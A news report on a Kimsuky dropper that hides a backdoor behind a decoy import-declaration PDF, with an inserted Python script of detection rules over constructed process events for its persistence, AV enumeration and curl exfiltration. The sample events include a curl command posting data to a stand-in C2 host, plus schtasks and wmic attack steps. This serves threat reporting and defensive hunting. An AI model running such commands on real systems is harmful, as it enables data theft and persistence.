Cybersecurity researchers from AhnLab Security Emergency Response Center (ASEC) have exposed this recent attack tactic by Kimsuky. The threat actor also deploys a sophisticated backdoor to steal sensitive information and execute malicious commands on the compromised systems.
The disguised dropper, ‘Import Declaration_Official Steamp Affixed.jse’, contains an obfuscated PowerShell script, a Base64-encoded backdoor file, and a seemingly legitimate PDF file named ‘Import Declaration.PDF’. Including a genuine PDF file is a strategic move by the threat group to mask the malicious activity, making it less conspicuous to users.
Behind the scenes, the backdoor is created in the %ProgramData% path with the filename ‘uVvMKg.i3IO’, and it is executed using rundll32.exe with a PowerShell command.
The malware ensures persistence by copying itself into both the %ProgramData% and %Public% paths under the filename ‘IconCache.db’ and registering itself with the task scheduler.
To exfiltrate sensitive system information, the backdoor employs commands such as wmic to check the anti-malware software, if any, and ipconfig to collect network details. The gathered data includes the hostname, user name, and OS information. To avoid detection, the malware encodes the command execution results before sending them to its command-and-control (C2) server.
The backdoor exhibits various functionalities, including system information retrieval, termination commands, execution path exploration, and the ability to run specific files and commands. Notably, the curl tool is utilised to send the data to the C2 server, emphasising the threat group’s advanced tactics.
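The behaviours described above (rundll32 launching PowerShell, a copy named IconCache.db placed under %ProgramData% or %Public%, a scheduled task pointing at it, wmic used to enumerate anti-malware products, and curl posting data out) can be turned into hunting rules over process-creation telemetry. The script below is an added example, not code from ASEC or from the malware; the event records are constructed in a Sysmon Event ID 1 style, the field names `parent`, `image` and `cmd` are assumptions, and the command lines are illustrative stand-ins rather than the real sample's invocations.

```python
import re
from typing import Callable, Dict, List

# Constructed process-creation records (Sysmon Event ID 1 style). They are
# illustrative stand-ins, not events taken from the ASEC report or a real host.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\wscript.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe shell32.dll,ShellExec_RunDLL powershell -w hidden -c <constructed>"},
    {"parent": r"C:\Windows\System32\rundll32.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell -w hidden -c Copy-Item C:\ProgramData\uVvMKg.i3IO C:\Users\Public\IconCache.db"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r"schtasks /create /tn Updater /tr C:\ProgramData\IconCache.db /sc minute /mo 10"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmd": r"wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmd": r"curl -d <constructed-base64-blob> http://c2.example.invalid/upload"},
    # Benign control: ipconfig on its own should not fire any rule.
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\ipconfig.exe",
     "cmd": "ipconfig /all"},
]

# IconCache.db legitimately lives under the user's %LocalAppData%; a copy under
# %ProgramData% or %Public% is the anomaly this report describes.
SUSPECT_COPIES = (r"c:\programdata\iconcache.db", r"c:\users\public\iconcache.db")

def _img(e: dict, name: str) -> bool:
    return e["image"].lower().endswith(name)

RULES: Dict[str, Callable[[dict], bool]] = {
    # rundll32 carrying a PowerShell command, or PowerShell spawned by rundll32
    "rundll32_powershell": lambda e: (_img(e, "rundll32.exe") and "powershell" in e["cmd"].lower())
        or (e["parent"].lower().endswith("rundll32.exe") and _img(e, "powershell.exe")),
    "iconcache_outside_localappdata": lambda e: any(p in e["cmd"].lower() for p in SUSPECT_COPIES),
    "schtasks_iconcache": lambda e: _img(e, "schtasks.exe")
        and "/create" in e["cmd"].lower() and "iconcache.db" in e["cmd"].lower(),
    "wmic_av_enumeration": lambda e: _img(e, "wmic.exe") and "antivirusproduct" in e["cmd"].lower(),
    # curl sending a request body is the exfiltration step; GETs are left alone here
    "curl_posting_data": lambda e: _img(e, "curl.exe")
        and re.search(r"(^|\s)(-d|--data(-binary)?|-F)\s", e["cmd"]) is not None,
}

def matches(event: dict) -> List[str]:
    """Names of the rules a single event triggers."""
    return [name for name, rule in RULES.items() if rule(event)]

def hunt(events: List[dict]) -> Dict[str, List[int]]:
    """Map each rule name to the indices of the events that triggered it."""
    hits: Dict[str, List[int]] = {name: [] for name in RULES}
    for i, e in enumerate(events):
        for name in matches(e):
            hits[name].append(i)
    return hits
```

Several distinct rules firing from one process tree within a short window is the stronger signal; any single rule, especially the curl one, will also match legitimate administration.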
One of the concerning aspects of this attack is the camouflage provided by the bait file, preventing users from easily identifying the infection. As these types of malware typically target specific entities, the researchers advise users to exercise caution when dealing with email attachments from unknown sources.
DPRK-based hackers have been unleashing chaos all over the world. In January, the FBI confirmed that Lazarus was behind the Harmony Horizon hack where the threat actor stole $63.5 million worth of crypto.
In September, Google’s Threat Analysis Group came out with a report detailing the involvement of North Korean hackers in targeting journalists.